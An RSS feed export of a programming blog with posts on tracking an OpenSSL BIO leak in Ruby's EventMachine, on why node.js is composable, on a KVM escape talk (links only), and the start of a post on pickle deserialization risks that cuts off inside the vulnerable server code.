<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Made of Bugs</title>
	<atom:link href="http://blog.nelhage.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.nelhage.com</link>
	<description>It's software. It's made of bugs.</description>
	<lastBuildDate>Thu, 07 Mar 2013 17:28:45 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.5.1</generator>
		<item>
		<title>Tracking down a memory leak in Ruby&#8217;s EventMachine</title>
		<link>http://blog.nelhage.com/2013/03/tracking-an-eventmachine-leak/</link>
		<comments>http://blog.nelhage.com/2013/03/tracking-an-eventmachine-leak/#comments</comments>
		<pubDate>Thu, 07 Mar 2013 17:13:37 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[Low-level hacking]]></category>
		<category><![CDATA[ruby]]></category>
		<category><![CDATA[Software Engineering]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=1863</guid>
		<description><![CDATA[At Stripe, we rely heavily on ruby and EventMachine to power various internal and external services. Over the last several months, we&#8217;ve known that one such service suffered from a gradual memory leak, that would cause its memory usage to gradually balloon from a normal ~50MB to multiple gigabytes. It was easy enough to work [...]]]></description>
				<content:encoded><![CDATA[<p>At <a href="https://stripe.com">Stripe</a>, we rely heavily on <a href="http://www.ruby-lang.org/en/">ruby</a> and
<a href="http://rubyeventmachine.com/">EventMachine</a> to power various internal and external
services. Over the last several months, we&#8217;ve known that one such
service suffered from a gradual memory leak, that would cause its
memory usage to gradually balloon from a normal ~50MB to multiple gigabytes.</p>

<p>It was easy enough to work around the leak by adding monitoring and
restarting the process whenever memory usage grew too large, but we
were determined to track down the root cause. Our exploration is a
tour through a number of different debugging tools and techniques, so
I thought I would share it here.</p>

<h2>Checking for ruby-level leaks</h2>

<p>One powerful technique for tracking down tough memory leaks is
post-mortem analysis. If our program&#8217;s normal memory footprint is
50MB, and we let it leak until it&#8217;s using, say, 2GB, 
1950/2000 =
97.5% of the program&#8217;s memory is leaked objects! If we look at a core
file (or, even better, a running image in <code>gdb</code>), signs of the leak
will be all over the place.</p>

<p>So, we let the program leak, and, when its memory usage got large
enough, failed active users over to a secondary server, and attached
gdb to the bloated image.</p>

<p>Our first instinct in a situation like this is that our Ruby code is
leaking somehow, such as by accidentally keeping a list of every
connection it has ever seen. It&#8217;s easy to investigate this possibility
by using gdb, the Ruby C API, and the Ruby internal GC hooks:</p>

<pre><code>(gdb) p rb_eval_string("GC.start")
$1 = 4
(gdb) p rb_eval_string("$gdb_objs = Hash.new 0")
$2 = 991401552
(gdb) p rb_eval_string("ObjectSpace.each_object {|o| $gdb_objs[o.class] += 1}")
$3 = 84435
(gdb) p rb_eval_string("$stderr.puts($gdb_objs.inspect)")
$4 = 4
</code></pre>

<p>Calling <code>rb_eval_string</code> lets us inject arbitrary ruby code into the
running ruby process, from within gdb. Using that, we first trigger a
GC &#8212; making sure that any unreferenced objects are cleaned up &#8212; and
then walk the Ruby ObjectSpace, building up a census of which Ruby
objects exist. Looking at the output and filtering for the top
objects, we find:</p>

<pre><code>String =&gt; 26399
Array  =&gt; 8402
Hash   =&gt; 2161
Proc   =&gt; 608
</code></pre>

<p>Just looking at those numbers, my gut instinct is that nothing looks
too out of whack. Running some back-of-the-envelope numbers confirms
this instinct:</p>

<ul>
<li>In total, that&#8217;s about 40,000 objects for those object types.</li>
<li>We&#8217;re looking for a gradual leak, so we expect lots of small
objects. Let&#8217;s guess that &#8220;small&#8221; is around 1 kilobyte.</li>
<li>40,000 1k objects is only 40MB. Our process is multiple GB at
this point, so we are nowhere near explaining our memory usage.</li>
</ul>

<p>It&#8217;s possible, of course, that <em>one</em> of those Strings has been growing
without bound, and is now billions of characters long, but that feels
unlikely. A quick survey of String lengths using <code>ObjectSpace</code> would
confirm that, but we didn&#8217;t even bother at this point.</p>

<h2>Searching for C object leaks</h2>

<p>So, we&#8217;ve mostly ruled out a Ruby-level leak. What now?</p>

<p>Well, as mentioned, 95+% of our program&#8217;s memory
footprint is leaked objects. So if we just take a random sample of
bits of memory, we will find leaked objects with very good
probability. We generate a core file in gdb:</p>

<pre><code>(gdb) gcore leak.core
Saved corefile leak.core
</code></pre>

<p>And then look at a random page (4k block) of the core file:</p>

<pre><code>$ off=$(($RANDOM % ($(stat -c "%s" leak.core)/4096)))
$ dd if=leak.core bs=4096 skip=$off count=1 | xxd
0000000: 0000 0000 0000 0000 4590 c191 3a71 b2aa  ........E...:q..
...
</code></pre>

<p>Repeating a few times, we notice that most of the samples include what
looks to be a repeating pattern:</p>

<pre><code>00000f0: b05e 9b0a 0000 0000 0000 0000 0000 0000  .^..............
0000100: 0000 0000 0000 0000 0100 0000 dcfa 1939  ...............9
0000110: 0000 0000 0000 0000 0a05 0000 0000 0000  ................
0000120: 0000 0000 0000 0000 d03b a51f 0000 0000  .........;......
0000130: 8000 0000 0000 0000 8100 0000 0000 0000  ................
0000140: 00a8 5853 1b7f 0000 0000 0000 0000 0000  ..XS............
0000150: 0000 0000 0000 0000 0100 0000 0100 0000  ................
0000160: 0000 0000 0000 0000 ffff ffff 0000 0000  ................
0000170: 40ef e145 0000 0000 0000 0000 0000 0000  @..E............
0000180: 0000 0000 0000 0000 0100 0000 0000 0000  ................
0000190: 0000 0000 0000 0000 0a05 0000 0000 0000  ................
00001a0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00001b0: 8000 0000 0000 0000 8100 0000 0000 0000  ................
00001c0: 00a8 5853 1b7f 0000 0000 0000 0000 0000  ..XS............
00001d0: 0000 0000 0000 0000 0100 0000 0100 0000  ................
00001e0: 0000 0000 0000 0000 ffff ffff 0000 0000  ................
00001f0: 4062 1047 0000 0000 0000 0000 0000 0000  @b.G............
0000200: 0000 0000 0000 0000 0100 0000 1b7f 0000  ................
0000210: 0000 0000 0000 0000 0a05 0000 0000 0000  ................
0000220: 0000 0000 0000 0000 e103 0000 0000 0000  ................
0000230: 8000 0000 0000 0000 9100 0000 0000 0000  ................
0000240: 00a8 5853 1b7f 0000 0000 0000 0000 0000  ..XS............
0000250: 0000 0000 0000 0000 0100 0000 0100 0000  ................
0000260: 0000 0000 0000 0000 ffff ffff 0000 0000  ................
0000270: 50b0 350b 0000 0000 0000 0000 0000 0000  P.5.............
0000280: 0000 0000 0000 0000 0100 0000 0000 0000  ................
0000290: 0000 0000 0000 0000 0a05 0000 0000 0000  ................
00002a0: 0000 0000 0000 0000 30de 4027 0000 0000  ........0.@'....
00002b0: 0077 7108 0000 0000 0060 7b97 b4d2 f111  .wq......`{.....
00002c0: 9000 0000 0000 0000 8100 0000 0000 0000  ................
00002d0: 00a8 5853 1b7f 0000 0000 0000 0000 0000  ..XS............
00002e0: 0000 0000 0000 0000 0100 0000 0100 0000  ................
</code></pre>

<p>Those <code>ffff ffff</code> blocks, repeated every 128 bytes, leap out at me,
and 4 out of 5 samples of the core file reveal a similar pattern. It seems
probable that we&#8217;re leaking 128-byte objects of some sort, some field
of which is <code>-1</code> as a signed 32-bit integer, i.e. <code>ffff ffff</code> in hex.</p>

<p>Looking further, we also notice a repeated <code>00a8 5853 1b7f 0000</code>, two lines before each <code>ffff ffff</code>. If you&#8217;ve stared at too many Linux coredumps, as I
have, that number looks suspicious. Interpreted in little-endian, that
is <code>0x00007f1b5358a800</code>, which points near the top of the userspace
portion of the address space on an amd64 Linux machine.</p>

<p>In fewer words: It&#8217;s most likely a pointer.</p>

<p>The presence of an identical pointer in every leaked object suggests
that the pointer most likely points to some kind of &#8220;type&#8221; object or
tag, containing information about type of the leaked object. For
instance, if we were leaking Ruby String objects, every one would have
an identical pointer to the Ruby object that represents the `String&#8217;
class. So, let&#8217;s take a look:</p>

<pre><code>(gdb) x/16gx 0x00007f1b5358a800
0x7f1b5358a800: 0x0000000000000401  0x00007f1b53340f24
0x7f1b5358a810: 0x00007f1b532c7780  0x00007f1b532c7690
0x7f1b5358a820: 0x00007f1b532c7880  0x00007f1b532c78c0
0x7f1b5358a830: 0x00007f1b532c74f0  0x00007f1b532c74c0
0x7f1b5358a840: 0x00007f1b532c7470  0x0000000000000000
0x7f1b5358a850: 0x0000000000000000  0x0000000000000000
0x7f1b5358a860: 0x0000000000000406  0x00007f1b5332a549
0x7f1b5358a870: 0x00007f1b532c7a40  0x00007f1b532c7a30
</code></pre>

<p>The first field, <code>0x401</code>, contains only two bits set, suggesting some
kind of flag field. After that, there are a whole bunch of
pointers. Let&#8217;s chase the first one:</p>

<pre><code>(gdb) x/s 0x00007f1b53340f24
0x00007f1b53340f24: "memory buffer"
</code></pre>

<p>Great. So we are leaking &#8230; memory buffers. Thanks.</p>

<p>But this is actually fantastically informative, especially coupled
with the one other piece of information we have: <code>/proc/&lt;pid&gt;/maps</code>
for the target program, which tells us which files are mapped into our
program at which addresses. Searching that for the target address, we
find:</p>

<pre><code>7f1b53206000-7f1b5336c000 r-xp 00000000 08:01 16697      /lib/libcrypto.so.0.9.8
</code></pre>

<p><code>0x7f1b53206000</code> ≤ <code>0x7f1b5358a800</code> &lt; <code>7f1b5336c000</code>, so this mapping
contains our &#8220;type&#8221; object. <code>libcrypto</code> is the library containing
OpenSSL&#8217;s cryptographic routines, so we are leaking some sort of
OpenSSL buffer object. This is real progress.</p>

<p>I am not overly familiar with libssl/libcrypto, so let&#8217;s go to the
source to learn more:</p>

<pre><code>$ apt-get source libssl0.9.8
$ cd openssl*
$ grep -r "memory buffer" .
./crypto/err/err_str.c:{ERR_PACK(ERR_LIB_BUF,0,0)       ,"memory buffer routines"},
./crypto/asn1/asn1.h: * be inserted in the memory buffer
./crypto/bio/bss_mem.c: "memory buffer",
./README:        sockets, socket accept, socket connect, memory buffer, buffering, SSL
./doc/ssleay.txt:-  BIO_s_mem()  memory buffer - a read/write byte array that
./test/times:talks both sides of the SSL protocol via a non-blocking memory buffer
</code></pre>

<p>Only one of those is a string constant, so we go browse
<code>./crypto/bio/bss_mem.c</code> and read the docs (<a href="http://www.openssl.org/docs/crypto/bio.html">bio(3)</a> and
<a href="http://www.openssl.org/docs/crypto/buffer.html">buffer(3)</a>) a bit. Sparing you all the details, we learn:</p>

<ul>
<li>OpenSSL uses the <code>BIO</code> structure as a generic abstraction around any kind of
source or sink of data that can be read or written to.</li>
<li>A <code>BIO</code> has a pointer to a <code>BIO_METHOD</code>, which essentially contains
a small amount of metadata and a
<a href="http://en.wikipedia.org/wiki/Virtual_method_table">vtable</a>,
describing what specific kind of <code>BIO</code> this is, and how to interact
with it. The second field in a <code>BIO_METHOD</code> is a <code>char *</code> pointing
at a string holding the name of this type.</li>
<li>One of the common types of <code>BIO</code>s is the <code>mem</code> <code>BIO</code>, backed
directly by an in-memory buffer (a <code>BUF_MEM</code>). The <code>BIO_METHOD</code> for
memory <code>BIO</code>s has the type tag <code>"memory buffer"</code>.</li>
</ul>

<p>So, it appears we are leaking <code>BIO</code> objects. Interestingly, we don&#8217;t
actually seem to be leaking the underlying memory buffers, just the
<code>BIO</code> struct that contains the metadata about the buffer.</p>

<h2>Tracing the source</h2>

<p>This kind of leak has to be in some C code somewhere. Clearly nothing in pure ruby code should be able to do this. The server in question contains no C extensions we wrote, so it&#8217;s probably in some third-party library we use.</p>

<p>A leak in OpenSSL itself is certainly possible, but OpenSSL is very
widely used and quite mature, so let&#8217;s assume (hope) that our leak is not
there, for now.</p>

<p>That leaves EventMachine as the most likely culprit. Our program uses
SSL heavily via the EventMachine APIs, and we do know that
EventMachine contains a bunch of C/C++, which, to be frank, does not
have a sterling reputation.</p>

<p>So, we pull up an EventMachine checkout. There are a number of ways to
construct a new <code>BIO</code>, but the most basic and common seems to be
<code>BIO_new</code>, sensibly enough. So let&#8217;s look for that:</p>

<pre><code>$ git grep BIO_new
ext/rubymain.cpp:       out = BIO_new(BIO_s_mem());
ext/ssl.cpp:    BIO *bio = BIO_new_mem_buf (PrivateMaterials, -1);
ext/ssl.cpp:    pbioRead = BIO_new (BIO_s_mem());
ext/ssl.cpp:    pbioWrite = BIO_new (BIO_s_mem());
ext/ssl.cpp:    out = BIO_new(BIO_s_mem());
</code></pre>

<p>Great: there are some calls (so it could be one of them!), but not too
many (so we can reasonably audit them all).</p>

<p>Starting from the top, we find, in <code>ext/rubymain.cpp</code>:</p>

<pre><code>static VALUE t_get_peer_cert (VALUE self, VALUE signature)
{
    VALUE ret = Qnil;
    X509 *cert = NULL;
    BUF_MEM *buf;
    BIO *out;

    cert = evma_get_peer_cert (NUM2ULONG (signature));

    if (cert != NULL) {
        out = BIO_new(BIO_s_mem());
        PEM_write_bio_X509(out, cert);
        BIO_get_mem_ptr(out, &amp;buf);
        ret = rb_str_new(buf-&gt;data, buf-&gt;length);
        X509_free(cert);
    BUF_MEM_free(buf);
    }

    return ret;
}
</code></pre>

<p>The OpenSSL APIs are less than perfectly self-descriptive, but it&#8217;s not too hard to puzzle out what&#8217;s going on here: </p>

<p>We first construct a new <code>BIO</code> backed by a memory buffer:</p>

<pre><code>out = BIO_new(BIO_s_mem());
</code></pre>

<p>We write the certificate text into that <code>BIO</code>:</p>

<pre><code>PEM_write_bio_X509(out, cert);
</code></pre>

<p>Get a pointer to the underlying <code>BUF_MEM</code>:</p>

<pre><code>BIO_get_mem_ptr(out, &amp;buf);
</code></pre>

<p>Convert it to a Ruby string:</p>

<pre><code>ret = rb_str_new(buf-&gt;data, buf-&gt;length);
</code></pre>

<p>And then free the memory:</p>

<pre><code>BUF_MEM_free(buf);
</code></pre>

<p>But we&#8217;ve called the wrong free function! We&#8217;re freeing <code>buf</code>, which
is the underlying <code>BUF_MEM</code>, but we&#8217;ve leaked <code>out</code>, which is the
<code>BIO</code> itself we also allocated. This is exactly the kind of leak we saw in our
core dump!</p>

<p>Continuing our audit, we find the exact same bug in
<code>ssl_verify_wrapper</code> in <code>ssl.cpp</code>. Reading code, we learn that
<code>t_get_peer_cert</code> is called by the Ruby function <a href="http://eventmachine.rubyforge.org/EventMachine/Connection.html#get_peer_cert-instance_method"><code>get_peer_cert</code></a>, used
to retrieve the peer certificate from a TLS connection, and that
<code>ssl_verify_wrapper</code> is called if you pass <code>:verify_peer =&gt; true</code> to
<a href="http://eventmachine.rubyforge.org/EventMachine/Connection.html#start_tls-instance_method"><code>start_tls</code></a>, to convert the certificate into a Ruby
string for passing to the <code>ssl_verify_peer</code> hook.</p>

<p>So, any time you make a <code>TLS</code> or <code>SSL</code> connection with EventMachine
<strong>and verify the peer certificate</strong>, EventMachine was leaking 128
bytes! Since it&#8217;s presumably pretty rare to make a large number of SSL
connections from a single Ruby process, it&#8217;s not totally surprising
that no one had caught this before.</p>

<p>Having found the issue, the
<a href="https://github.com/eventmachine/eventmachine/commit/b2006a6f4893f35ca8b1b5fc283f3b1e2127bc5c">fix</a>
was simple, and was promptly
<a href="https://github.com/eventmachine/eventmachine/commit/016800f60bd1ec1894fd73ccd0c2634f5fabc1c9">merged</a>
upstream.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2013/03/tracking-an-eventmachine-leak/feed/</wfw:commentRss>
		<slash:comments>10</slash:comments>
		</item>
		<item>
		<title>Why node.js is cool (it&#8217;s not about performance)</title>
		<link>http://blog.nelhage.com/2012/03/why-node-js-is-cool/</link>
		<comments>http://blog.nelhage.com/2012/03/why-node-js-is-cool/#comments</comments>
		<pubDate>Mon, 12 Mar 2012 15:36:35 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[Software Engineering]]></category>
		<category><![CDATA[composability]]></category>
		<category><![CDATA[networking]]></category>
		<category><![CDATA[node.js]]></category>
		<category><![CDATA[software]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=484</guid>
		<description><![CDATA[For the past N months, it seems like there is no new technology stack that is either hotter or more controversial than node.js. node.js is cancer! node.js cures cancer! node.js is bad ass rock star tech!. I myself have given node.js a lot of shit, often involving the phrase &#8220;explicit continuation-passing style.&#8221; Most of the [...]]]></description>
				<content:encoded><![CDATA[<p>For the past N months, it seems like there is no new technology stack
that is either hotter or more controversial than node.js. <a href="http://teddziuba.com/2011/10/node-js-is-cancer.html">node.js is
cancer</a>!
<a href="http://blog.brianbeck.com/post/10967024222/node-js-cures-cancer">node.js cures
cancer</a>!
<a href="http://www.youtube.com/watch?v=bzkRVzciAZg">node.js is bad ass rock star
tech</a>!. I myself have
given node.js a lot of shit, often involving the phrase &#8220;explicit
continuation-passing style.&#8221;</p>

<p>Most of the arguments I&#8217;ve seen seem to center around whether node.js
is &#8220;scalable&#8221; or high-performance, and the relative merits of
single-threaded event loops versus threading for scaling out, or other
such noise. Or how to best write a Fibonacci server in node.js (wat?).</p>

<p>I am going to completely ignore all of that (and I think you should,
too!), and argue that node.js is in fact on to something really cool,
and is worth using and thinking about, but for a reason that has
absolutely nothing to do with scalability or performance.</p>

<h2>The Problem</h2>

<p>node.js is cool because it solves a problem shared by virtually every
mainstream language. That problem is the fact that, as long as
&#8220;ordinary&#8221; blocking code is the default, it is difficult and unnatural
to write networked code in a way that it can be combined with other
network code, while allowing them to interact.</p>

<p>In most languages/environments &#8212; virtually every other language
people use today &#8212; when you write networked code, you can either make
it fully blocking itself, and implement your own main loop &#8212; which is
almost always easiest &#8212; or you can pick your favorite event loop
library (you probably have half a dozen choices), and write your code
around that. If you do the latter, not only will your code likely be
more awkward than if you chose the blocking main loop approach, but
your only reward for the effort is that your code is combinable with
the small fraction of other code that also chose the same event loop
library.</p>

<p>The upshot of this situation is that if you pick a couple of random
networked libraries written by different people &#8212; let&#8217;s say, an HTTP
server, a Twitter client, and an IRC client, for example &#8212; and want
to combine them &#8212; maybe you want a Twitter < -> IRC bridge with a
web-based admin panel &#8212; you will end up at best having to write some
awkward glue code, and at worst doing something truly hackish in order
to make them communicate at all.</p>

<p>(In case you&#8217;re not convinced about the existence or scope of this
problem, you can detour ahead to the optional <a href="#example">example</a> of
how this problem manifests with typical Python libraries)</p>

<h2>Enter node.js</h2>

<p>node.js solves this problem, somewhat paradoxically by reducing the
number of options available to developers. By having a built-in event
loop, and by making that event loop the default way to accomplish
virtually anything at all (e.g. all of the builtin IO functions work
asynchronously on the same event loop), node.js provides a very strong
pressure to write networked code in a certain way. The upshot of this
pressure is that, since essentially every node.js library works this
way, you can pick and choose arbitrary node.js libraries and combine
them in the same program, without even having to think about the fact
that you&#8217;re doing so.</p>

<p>node.js is cool, then, not for any performance or scalability reasons,
but because <strong>it makes composable networked components the default</strong>.</p>

<h2>Concluding Notes</h2>

<p>An interesting point here is that there is not really any fundamental
differences between what you <strong>can</strong> do in Python and node.js. The
Twisted project, for example, is basically an attempt to implement the
node.js ideology in Python (yes, I&#8217;m being terribly anachronistic
describing it that way). Twisted, however, has a fairly steep learning
curve, and &#8220;feels&#8221; unnatural to developers used to writing &#8220;normal&#8221;
Python, and so relatively few libraries get written for the Twisted
environment, compared to the rest of the Python ecosystem. Twisted
suffers from the fact that the Python language and Python community
are not set up to make Twisted the default way to do things.</p>

<p>The key is that node.js makes it, both technically and socially,
<strong>easier</strong> to write code in this composable way than not to do so. The
built-in event loop and nonblocking primitives make it technically
easy, and the social culture that has grown up around it discourages
libraries that don&#8217;t work this way, so libraries that attempt to just
block for IO are looked down on and are unlikely to thrive and gain
adoption and development resources.</p>

<p>I&#8217;m also not ignoring the downside of the node.js style &#8212; the
potentially convoluted callback-based style, the risk of bringing the
whole world to a halt with an accidental blocking call, the
single-threaded model that makes it hard to effectively exploit
multiple cores. node.js definitely makes you do more work than you
might otherwise have to, in many circumstances. But the key is, in
exchange for this work, you <strong>get</strong> something really cool &#8212; and
something much more valuable, in my opinion, than nebulous performance
gains.</p>

<p>I also don&#8217;t want to claim that node.js is the only system, or the
only technical approach, that makes this property possible. But
node.js is the most successful such system I know of, and that&#8217;s worth
at least as much as the technical possibility &#8212; what&#8217;s the use of
being able to combine third-party libraries, if no one has written
anything worth using in the first place?</p>

<p>And similarly, while the single-threaded callback model may not be the
best possible model, it seems to have hit some sweet spot for finding
a sweet spot in terms of what developers are willing to put up
with. Certainly, people are writing node.js code like mad &#8212; check out
the <a href="http://search.npmjs.org/">npm registry</a> for a partial list.</p>

<p>So, node.js is not magic, and it definitely doesn&#8217;t cure cancer. But
there is something here worth looking at. The next time you need to
glue some unrelated networked services together, give node.js a shot
&#8211; I think you&#8217;ll like it. And if you&#8217;re still not convinced, glue a
quick HTTP frontend onto whatever you&#8217;ve created. I promise you&#8217;ll be
shocked by how easy it is.</p>

<p><a name="example"></a></p>

<h2>Postscript &#8211; A Python Example</h2>

<p>As an optional addendum, here&#8217;s a step-by-step discussion of how just
bad the situation is in most other languages.</p>

<p>Let&#8217;s imagine we want to write a trivial Jabber -> IRC bridge: A bot
that lurks in an IRC channel, and signs on to Jabber, and sends all
the messages it receives on Jabber into the IRC channel. This is the
kind of simple problem that can be described in one sentence, and
sounds like it should take all of 20 lines of code, but actually turns
out to be rather a nuisance.</p>

<p>Python has, by this point, a great library ecosystem, so we happily
start googling, and find the plausible looking <a href="http://python-irclib.sourceforge.net/">python-irclib</a>
and <a href="http://xmpppy.sourceforge.net/">xmpppy</a> libraries. Great. So, what does code in each of
those look like? Well, in python-irclib, we construct a subclass of
<code>SingleServerIRCBot</code>, and call the <code>start</code> function, which runs the
IRC main loop:</p>

<pre><code>bot = MyBot(channel, nickname, server, port)
bot.start()
</code></pre>

<p>And in xmpppy, we construct an <code>xmpp.Client</code> object, and call
<code>Client.Process</code> in a loop, with a timeout:</p>

<pre><code>conn = xmpp.Client(server)
# connect to the server
while True:
  conn.Process(1)
</code></pre>

<p>Ok, so, we launch a thread for each one, and a few minutes of fumbling
later, we&#8217;re connected to both Jabber and IRC. So far, so good. We&#8217;re
using Python&#8217;s threads, which will inevitably bring us a world of
pain, but I&#8217;ll ignore that for now, since a better threading
implementation could fix most of the pain.</p>

<p>But now, what do we do when we receive a Jabber message? We want to
send a message out the python-irclib instance, but how do we do that?
python-irclib isn&#8217;t thread safe, so we can&#8217;t just call <code>.send()</code> from
the Jabber thread. Ok, so we add in a <code>Queue.Queue</code>, and have the
Jabber thread push messages onto it.</p>

<p>Now we just need to make the IRC thread fetch messages from this
queue. But how do we do that? The IRC thread is blocked somewhere deep
inside <code>python-irclib</code>, waiting for network traffic. How do we wake it
up to read messages from the queue? The easiest way is to switch from
calling <code>start</code> to calling <code>process_once</code> in a loop with a short
timeout.</p>

<p>This will work, and we&#8217;ll eventually get something working, but now
we&#8217;re forced into polling, with all the annoying latency/CPU tradeoffs
that entails, and also half of our code so far has just been spent
gluing these two libraries together.</p>

<p>In node.js, on the other hand, we&#8217;d just instantiate client objects
for both protocols, set up some event handlers, and &#8230; well, that&#8217;s
about it. Because everything&#8217;s hooked into the same main loop, they&#8217;ll
Just Work together, and because we&#8217;re all running single-threaded, we
can mostly just communicate directly between the two libraries without
having to think too hard about race conditions or anything.</p>

<p>The point, of course, is not that this is impossible to write this
program in Python. It is, and I&#8217;ve done it, and it&#8217;s not <strong>that</strong>
terrible. But any option you take will involve some annoying
tradeoffs, and will involve making lots of irrelevant plumbing
decisions about how to make your pieces play well together. And
compared to all that, node.js feels like a breeze.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2012/03/why-node-js-is-cool/feed/</wfw:commentRss>
		<slash:comments>18</slash:comments>
		</item>
		<item>
		<title>BlackHat/DEFCON 2011 talk: Breaking out of KVM</title>
		<link>http://blog.nelhage.com/2011/08/breaking-out-of-kvm/</link>
		<comments>http://blog.nelhage.com/2011/08/breaking-out-of-kvm/#comments</comments>
		<pubDate>Mon, 08 Aug 2011 17:32:29 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[Computer Security]]></category>
		<category><![CDATA[Low-level hacking]]></category>
		<category><![CDATA[blackhat]]></category>
		<category><![CDATA[DEFCON]]></category>
		<category><![CDATA[exploits]]></category>
		<category><![CDATA[kvm]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=474</guid>
		<description><![CDATA[I&#8217;ve posted the final slides from my talk this year at DEFCON and Black Hat, on breaking out of the KVM Kernel Virtual Machine on Linux. Virtunoid: Breaking out of KVM [Edited 2011-08-11] The code is now available. It should be fairly well-commented, and include links to everything you&#8217;ll need to get the exploit up [...]]]></description>
				<content:encoded><![CDATA[<p>I&#8217;ve posted <a href="http://nelhage.com/talks/kvm-defcon-2011.pdf">the final slides</a> from my talk this year at <a href="http://defcon.org/">DEFCON</a> and <a href="http://blackhat.com/">Black Hat</a>, on breaking out of the <a href="http://www.linux-kvm.org/page/Main_Page">KVM</a> Kernel Virtual Machine on Linux.</p>

<div style="width:425px; margin:auto; padding: 1em" id="__ss_8908773"><strong style="display:block;margin:12px 0 4px"><a href="http://www.slideshare.net/NelsonElhage/virtunoid-breaking-out-of-kvm" title="Virtunoid: Breaking out of KVM">Virtunoid: Breaking out of KVM</a></strong><object id="__sse8908773" width="425" height="355"><param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=kvm-defcon-2011-110818165327-phpapp02&#038;stripped_title=virtunoid-breaking-out-of-kvm&#038;userName=NelsonElhage" /><param name="allowFullScreen" value="true"/><param name="allowScriptAccess" value="always"/><embed name="__sse8908773" src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=kvm-defcon-2011-110818165327-phpapp02&#038;stripped_title=virtunoid-breaking-out-of-kvm&#038;userName=NelsonElhage" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"/></object></div>

<p><b>[Edited 2011-08-11]</b> The <a href="https://github.com/nelhage/virtunoid">code is now available</a>. It should be fairly well-commented, and include links to everything you&#8217;ll need to get the exploit up and running in a local test environment, if you&#8217;re so inclined.</p>

<p>In addition, as I mentioned, this bug was found by a simple KVM fuzzer I wrote. I&#8217;m also going to clean that up and release it, but don&#8217;t expect it too soon.</p>

<p>I had a great time meeting lots of interesting people at BlackHat and DEFCON, some that I&#8217;d met online and others I hadn&#8217;t. If any of you are ever in Boston, drop me a note and we can grab a beer or something.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2011/08/breaking-out-of-kvm/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Exploiting misuse of Python&#8217;s &#8220;pickle&#8221;</title>
		<link>http://blog.nelhage.com/2011/03/exploiting-pickle/</link>
		<comments>http://blog.nelhage.com/2011/03/exploiting-pickle/#comments</comments>
		<pubDate>Sun, 20 Mar 2011 22:38:13 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[Computer Security]]></category>
		<category><![CDATA[pickle]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[shell]]></category>
		<category><![CDATA[twisted]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=469</guid>
		<description><![CDATA[If you program in Python, you&#8217;re probably familiar with the pickle serialization library, which provides for efficient binary serialization and loading of Python datatypes. Hopefully, you&#8217;re also familiar with the warning printed prominently near the start of pickle&#8216;s documentation: Warning: The pickle module is not intended to be secure against erroneous or maliciously constructed data. [...]]]></description>
				<content:encoded><![CDATA[<p>If you program in Python, you&#8217;re probably familiar with the
<a href="http://docs.python.org/library/pickle.html"><code>pickle</code></a> serialization library, which provides for efficient
binary serialization and loading of Python datatypes. <em>Hopefully</em>,
you&#8217;re also familiar with the warning printed prominently near the
start of <code>pickle</code>&#8216;s documentation:</p>

<blockquote>
  <p><em>Warning:</em> The pickle module is not intended to be secure against
  erroneous or maliciously constructed data. Never unpickle data
  received from an untrusted or unauthenticated source.</p>
</blockquote>

<p>Recently, however, I stumbled upon a project that was accepting and
unpacking untrusted pickles over the network, and a poll of some
friends revealed that few of them were aware of just how easy it is to
exploit a service that does this. As such, this blog post will
describe exactly how trivial it is to exploit such a service, using a
simplified version of the code I recently encountered as an
example. Nothing in here is novel, but it&#8217;s interesting if you haven&#8217;t
seen it.</p>

<h2>The Target</h2>

<p>The vulnerable code was a <a href="http://twistedmatrix.com/">Twisted</a> server that listened over
SSL. The code looked roughly like the following:</p>


<div class="wp_syntax"><table><tr><td class="code"><pre class="python" style="font-family:monospace;"><span style="color: #ff7700;font-weight:bold;">class</span> VulnerableProtocol<span style="color: black;">&#40;</span>protocol.<span style="color: black;">Protocol</span><span style="color: black;">&#41;</span>:
  <span style="color: #ff7700;font-weight:bold;">def</span> dataReceived<span style="color: black;">&#40;</span><span style="color: #008000;">self</span><span style="color: #66cc66;">,</span> data<span style="color: black;">&#41;</span>:
&nbsp;
     <span style="color: #808080; font-style: italic;"># Code to actually parse incoming data according to an</span>
     <span style="color: #808080; font-style: italic;">#  internal state machine</span>
     <span style="color: #808080; font-style: italic;"># If we just finished receiving headers, call verifyAuth() to</span>
       check authentication
&nbsp;
  <span style="color: #ff7700;font-weight:bold;">def</span> verifyAuth<span style="color: black;">&#40;</span><span style="color: #008000;">self</span><span style="color: #66cc66;">,</span> headers<span style="color: black;">&#41;</span>:
    <span style="color: #ff7700;font-weight:bold;">try</span>:
